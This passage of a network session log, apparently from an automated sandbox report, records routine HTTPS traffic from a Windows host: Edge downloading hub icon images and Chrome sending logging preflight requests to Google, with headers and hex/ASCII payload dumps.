2024-07-26 18:10:26 UTC	16384	IN	Data Raw: 8f 67 d5 e8 e4 34 eb e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 Data Ascii: g4,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: c8 b1 0e c3 45 a4 cf 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 Data Ascii: E4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vH
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: 94 22 1e 7d b0 6a 95 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 Data Ascii: "}jVG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	64058	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:27 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:27 UTC	543	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:27 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 9e35b8ed-701e-0041-6275-df4014000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181027Z-15c77d89844fw8hl33t201z4f4000000021000000000n6pc Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:27 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	64060	142.250.185.142	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	549	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 18:10:28 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:28 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	64065	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:28 UTC	522	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: 71e0fc27-a01e-0048-4be7-de5a9a000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181028Z-15c77d89844gz897ek6mt7dy2c000000023000000000k8vw Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-07-26 18:10:28 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	64064	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:28 UTC	536	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: ba5d4cf7-401e-0049-4c74-df5b67000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181028Z-15c77d89844p462nas149kd9cw000000022g00000000mq4a Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:28 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	64063	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:28 UTC	522	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: bc5c9aee-101e-0073-4ce7-de18c4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181028Z-15c77d89844x9ltxwntebcafsc00000002gg0000000059wg Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-07-26 18:10:28 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	64062	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:28 UTC	543	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: a62a32a7-b01e-005c-5b74-df99fe000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181028Z-15c77d89844n4lq8f08fkz0bg0000000021g00000000gcxz Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:28 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	64061	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:28 UTC	536	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: 56250762-001e-0045-36e7-deb596000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181028Z-15c77d89844qslxgp25v206ug0000000025g00000000qtch Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:28 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	64068	142.250.185.142	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	549	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 18:10:28 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:28 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	64071	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:28 UTC	543	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: f7c1f221-301e-0064-4474-dfd8a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181028Z-15c77d89844d9pv5vk6xmbvv7400000002000000000019cx Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:28 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	64074	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:29 UTC	543	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:29 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 71e10137-a01e-0048-5ee7-de5a9a000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181029Z-15c77d89844sxstpzzww8hmu1w000000028000000000ap1t Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
